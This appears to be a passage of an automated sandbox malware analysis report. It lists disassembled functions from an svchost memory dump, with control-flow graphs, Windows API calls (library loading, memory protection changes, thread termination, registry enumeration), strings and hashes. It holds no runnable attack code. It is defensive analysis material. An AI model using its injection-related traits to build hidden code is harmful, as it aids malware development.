606->586 606->614 612 1fb539ca719-1fb539ca74b 607->612 616 1fb539ca887-1fb539ca88e 612->616 617 1fb539ca751-1fb539ca75c 612->617 619 1fb539ca8e9-1fb539ca8ed 614->619 620 1fb539ca9f6-1fb539caa12 call 1fb539c9634 * 2 call 1fb539cc6a8 614->620 616->591 616->612 617->616 621 1fb539ca762-1fb539ca77b 617->621 623 1fb539ca8ef-1fb539ca8fe call 1fb539c9ce4 619->623 624 1fb539ca900 619->624 620->573 625 1fb539ca874-1fb539ca879 621->625 626 1fb539ca781-1fb539ca7c6 call 1fb539c9cf8 * 2 621->626 634 1fb539ca903-1fb539ca90d call 1fb539cb4ac 623->634 624->634 630 1fb539ca884 625->630 654 1fb539ca7c8-1fb539ca7ee call 1fb539c9cf8 call 1fb539cac38 626->654 655 1fb539ca804-1fb539ca80a 626->655 630->616 634->586 646 1fb539ca913-1fb539ca961 call 1fb539c9944 call 1fb539c9b50 634->646 638->578 653 1fb539ca654-1fb539ca674 call 1fb539c9634 * 2 call 1fb539cb4ac 638->653 639->638 645 1fb539ca630-1fb539ca63b 639->645 645->638 650 1fb539ca63d-1fb539ca642 645->650 646->586 650->573 650->638 676 1fb539ca676-1fb539ca680 call 1fb539cb59c 653->676 677 1fb539ca68b 653->677 670 1fb539ca815-1fb539ca872 call 1fb539ca470 654->670 671 1fb539ca7f0-1fb539ca802 654->671 659 1fb539ca87b 655->659 660 1fb539ca80c-1fb539ca810 655->660 664 1fb539ca880 659->664 660->626 664->630 670->664 671->654 671->655 680 1fb539ca686-1fb539ca9ef call 1fb539c92ac call 1fb539caff4 call 1fb539c94a0 676->680 681 1fb539ca9f0-1fb539ca9f5 call 1fb539cc6a8 676->681 677->578 680->681 681->620
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction ID: 338b81fb1fb998c2e9a63077ae0a77f9f53bcbf061a28ddd9ec4cac16e89678f
                                                                      • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                      • Instruction Fuzzy Hash: 73E1D5B261A74A8AEB20DF25D4C13ED77A2F745B98F0C0125EE8A57BA5CB3CC581C701
                                                                      Function 000001FB53999944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 449 1fb53999944-1fb539999ac call 1fb5399a814 452 1fb53999e13-1fb53999e1b call 1fb5399bb48 449->452 453 1fb539999b2-1fb539999b5 449->453 453->452 454 1fb539999bb-1fb539999c1 453->454 457 1fb539999c7-1fb539999cb 454->457 458 1fb53999a90-1fb53999aa2 454->458 457->458 461 1fb539999d1-1fb539999dc 457->461 459 1fb53999d63-1fb53999d67 458->459 460 1fb53999aa8-1fb53999aac 458->460 462 1fb53999d69-1fb53999d70 459->462 463 1fb53999da0-1fb53999daa call 1fb53998a34 459->463 460->459 464 1fb53999ab2-1fb53999abd 460->464 461->458 465 1fb539999e2-1fb539999e7 461->465 462->452 467 1fb53999d76-1fb53999d9b call 1fb53999e1c 462->467 463->452 477 1fb53999dac-1fb53999dcb call 1fb53996d40 463->477 464->459 469 1fb53999ac3-1fb53999aca 464->469 465->458 466 1fb539999ed-1fb539999f7 call 1fb53998a34 465->466 466->477 480 1fb539999fd-1fb53999a28 call 1fb53998a34 * 2 call 1fb53999124 466->480 467->463 470 1fb53999c94-1fb53999ca0 469->470 471 1fb53999ad0-1fb53999b07 call 1fb53998e10 469->471 470->463 478 1fb53999ca6-1fb53999caa 470->478 471->470 485 1fb53999b0d-1fb53999b15 471->485 482 1fb53999cba-1fb53999cc2 478->482 483 1fb53999cac-1fb53999cb8 call 1fb539990e4 478->483 517 1fb53999a48-1fb53999a52 call 1fb53998a34 480->517 518 1fb53999a2a-1fb53999a2e 480->518 482->463 484 1fb53999cc8-1fb53999cd5 call 1fb53998cb4 482->484 483->482 493 1fb53999cdb-1fb53999ce3 483->493 484->463 484->493 491 1fb53999b19-1fb53999b4b 485->491 495 1fb53999c87-1fb53999c8e 491->495 496 1fb53999b51-1fb53999b5c 491->496 498 1fb53999df6-1fb53999e12 call 1fb53998a34 * 2 call 1fb5399baa8 493->498 499 1fb53999ce9-1fb53999ced 493->499 495->470 495->491 496->495 500 1fb53999b62-1fb53999b7b 496->500 498->452 502 1fb53999d00 499->502 503 1fb53999cef-1fb53999cfe call 1fb539990e4 499->503 504 1fb53999c74-1fb53999c79 500->504 505 1fb53999b81-1fb53999bc6 call 1fb539990f8 * 2 500->505 513 1fb53999d03-1fb53999d0d call 1fb5399a8ac 502->513 503->513 509 1fb53999c84 504->509 531 1fb53999c04-1fb53999c0a 505->531 532 1fb53999bc8-1fb53999bee call 1fb539990f8 call 1fb5399a038 505->532 509->495 513->463 528 1fb53999d13-1fb53999d61 call 1fb53998d44 call 1fb53998f50 513->528 517->458 530 1fb53999a54-1fb53999a74 call 1fb53998a34 * 2 call 1fb5399a8ac 517->530 518->517 522 1fb53999a30-1fb53999a3b 518->522 522->517 527 1fb53999a3d-1fb53999a42 522->527 527->452 527->517 528->463 555 1fb53999a76-1fb53999a80 call 1fb5399a99c 530->555 556 1fb53999a8b 530->556 537 1fb53999c0c-1fb53999c10 531->537 538 1fb53999c7b 531->538 549 1fb53999c15-1fb53999c72 call 1fb53999870 532->549 550 1fb53999bf0-1fb53999c02 532->550 537->505 542 1fb53999c80 538->542 542->509 549->542 550->531 550->532 559 1fb53999a86-1fb53999def call 1fb539986ac call 1fb5399a3f4 call 1fb539988a0 555->559 560 1fb53999df0-1fb53999df5 call 1fb5399baa8 555->560 556->458 559->560 560->498
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574742775.000001FB53990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB53990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb53990000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: fa9bbf22c5165d2bb50162e04197a4c728e4534f610685b807383e084df18b8a
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: 5FE1A2B360A7428AFB60DF65D4D03ED77A6F749798F180125EE4A57BA5DB38C091CB00
                                                                      Function 000001FB539CF394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 691 1fb539cf394-1fb539cf3e6 692 1fb539cf4d7 691->692 693 1fb539cf3ec-1fb539cf3ef 691->693 696 1fb539cf4d9-1fb539cf4f5 692->696 694 1fb539cf3f9-1fb539cf3fc 693->694 695 1fb539cf3f1-1fb539cf3f4 693->695 697 1fb539cf402-1fb539cf411 694->697 698 1fb539cf4bc-1fb539cf4cf 694->698 695->696 699 1fb539cf413-1fb539cf416 697->699 700 1fb539cf421-1fb539cf440 LoadLibraryExW 697->700 698->692 701 1fb539cf516-1fb539cf525 GetProcAddress 699->701 702 1fb539cf41c 699->702 703 1fb539cf4f6-1fb539cf50b 700->703 704 1fb539cf446-1fb539cf44f GetLastError 700->704 707 1fb539cf527-1fb539cf54e 701->707 708 1fb539cf4b5 701->708 705 1fb539cf4a8-1fb539cf4af 702->705 703->701 706 1fb539cf50d-1fb539cf510 FreeLibrary 703->706 709 1fb539cf496-1fb539cf4a0 704->709 710 1fb539cf451-1fb539cf468 call 1fb539cc928 704->710 705->697 705->708 706->701 707->696 708->698 709->705 710->709 713 1fb539cf46a-1fb539cf47e call 1fb539cc928 710->713 713->709 716 1fb539cf480-1fb539cf494 LoadLibraryExW 713->716 716->703 716->709
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-537541572
                                                                      • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction ID: 4aa6df102775c91470a30eaca5d58870190ca1f5ab6b237e14a952d32f0ac0da
                                                                      • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                      • Instruction Fuzzy Hash: 2F41F1B231FA4681FA16CB16E8843F52393BB49BA0F4D45399D0B877A4EF3CC4458360
                                                                      Function 000001FB539C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 717 1fb539c104c-1fb539c10b9 RegQueryInfoKeyW 718 1fb539c11b5-1fb539c11d0 717->718 719 1fb539c10bf-1fb539c10c9 717->719 719->718 720 1fb539c10cf-1fb539c111f RegEnumValueW 719->720 721 1fb539c11a5-1fb539c11af 720->721 722 1fb539c1125-1fb539c112a 720->722 721->718 721->720 722->721 723 1fb539c112c-1fb539c1135 722->723 724 1fb539c1147-1fb539c114c 723->724 725 1fb539c1137 723->725 727 1fb539c1199-1fb539c11a3 724->727 728 1fb539c114e-1fb539c1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 724->728 726 1fb539c113b-1fb539c113f 725->726 726->721 729 1fb539c1141-1fb539c1145 726->729 727->721 728->727 729->724 729->726
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                      • String ID: d
                                                                      • API String ID: 3743429067-2564639436
                                                                      • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction ID: cd5e0a5dff588b072592f6f5fec2fbd5c03b9c3fd72847433edc5f87d93d953f
                                                                      • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                      • Instruction Fuzzy Hash: 2C416273219B85C6E760CF61E4847AF77A2F389B98F488125DA8A47768DF3CC545CB40
                                                                      Function 000001FB539CD068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • FlsGetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD087
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0A6
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0CE
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0DF
                                                                      • FlsSetValue.KERNEL32(?,?,?,000001FB539CC7DE,?,?,?,?,?,?,?,?,000001FB539CCF9D,?,?,00000001), ref: 000001FB539CD0F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID: 1%$Y%
                                                                      • API String ID: 3702945584-1395475152
                                                                      • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction ID: 968b9330f179ee5e314775584756f230334fc7093088daeda48f812371d2e503
                                                                      • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                      • Instruction Fuzzy Hash: DD110DB060E28E41FA68A72AD6D23FA63435B847E0F5C4235982B467FADB2C85029710
                                                                      Function 000001FB539C7510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: caca88eb4ff424c5bfd08270abe60720f522a2b93f121c2b0dd3a671aa919aca
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 60817BF960A64BCEFB50AB69E4D13F96392AB89780F5C44359A07C77B6DB3CC8458700
                                                                      Function 000001FB539C9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 76704e09874f35ba00da39aab094292295e922183a9bda5e610428fd81b52da4
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: BA31C0B121BA46A1EE22DB42E880BF56396B758BA0F5D09359D2F0B7A1EF3CC5558300
                                                                      Function 000001FB539D3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: f19f250884e5a5ca10a7d28f396b53d68425f9b958b93f700f72ddf209fe23ad
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: F2116072319B8286F7508B56F88536967A1F788FE5F484634EA5B877A4CF7CC8148740
                                                                      Function 000001FB539C3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: 5c0b12d5fc8e251d62a9ecb423148d3d6f5980d317266ae4fff7775e2e87b1f2
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: 8B115E7670AB8682FF549B66F4842B963A2F748B85F4C0439DE8A077A4EF3DC505C704
                                                                      Function 000001FB539C5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: 5469abee5b4e9bf0bdf770da9b99d52bae9361e8749dbde8dcbd5f420d2bc2f2
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 17D17D76209B4985EB709B16E4D43AA77A1F3C8B84F580126EACE47BB5DF3CC551CB40
                                                                      Function 000001FB539C2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: cc9ad914701f13315fd69f315d2c8feb691bd09a9d7ccb6b0530ae7b9a7b48cd
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: C131837670AB5A82FA15DF56D5C07BAA792FB44B84F0C44309E8A47B65EF3CC4A18740
                                                                      Function 000001FB539CCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 8e2cc52478816b46073d1eda117981dfc24803c2b807f92ef055f03951766850
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: 4A115EB020F28A81FA64A726D6C63BD63435B887F0F5C4734A837467FADF6C84029710
                                                                      Function 000001FB539C199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: d96a0d85e18bd00034df92b739627b984554b744396f702b8ef2f930aa75394b
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: 67016D71309A8682FB14DB52E4883AA63A2F788BC0F8C4435DE8A43765DF3CC549C700
                                                                      Function 000001FB539C36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: fda331bf91d84a1e7dd7c21d20511b9b3e708f0354f79a4ceedf790b70eea54f
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 650121B521A74682FB249B56F8893A563A2BB49B85F4C4834CD4A07774EF3DC1448B00
                                                                      Function 000001FB539C9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 170696c3728ef68149a4f5dd5ab44c4829b88e797df50feb444b0b5984898a95
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 4551BFB270A24B8AEB14CB15E489BBA3797F344B88F5D8534DA07477A8EB39C841C704
                                                                      Function 000001FB539C8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: a804f7a027a439150108e4f724fee75847e24b7a128904c366b285a41af1a838
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: DD31D1B220A686C6E714DF12E8897AA77A6F344B88F4D8434EE47477A9DB3DC941C704
                                                                      Function 000001FB539C1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: 7041c7b363bb532df87a82727498a3c47e6c77f4aba70d1cec084aacf5478d1c
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: BCF044B230968692F7608F21F8C47A96762F748BC8FCC4030DA4A46A64DF3CC64DCB04
                                                                      Function 000001FB539C3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 3d718759b31359e7105f5c9c5d76d0a703cea5687920891f1199a65a2e33e12e
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 50F0F8B561ABC682FA148B52F9951A9A762AB48FD0F4C9530EE4B47B28DF2CC4458700
                                                                      Function 000001FB539CBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 02050852133c47cbee4d85a20b7f67a6a3ee0c205252fbf7605758d57af0b57c
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 64F062B521A64681FB108F29E4853B96322EB85761F9C0A39CA6B453F4DF3CC444C340
                                                                      Function 000001FB539C50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000042.00000002.2574820260.000001FB539C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FB539C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_66_2_1fb539c0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
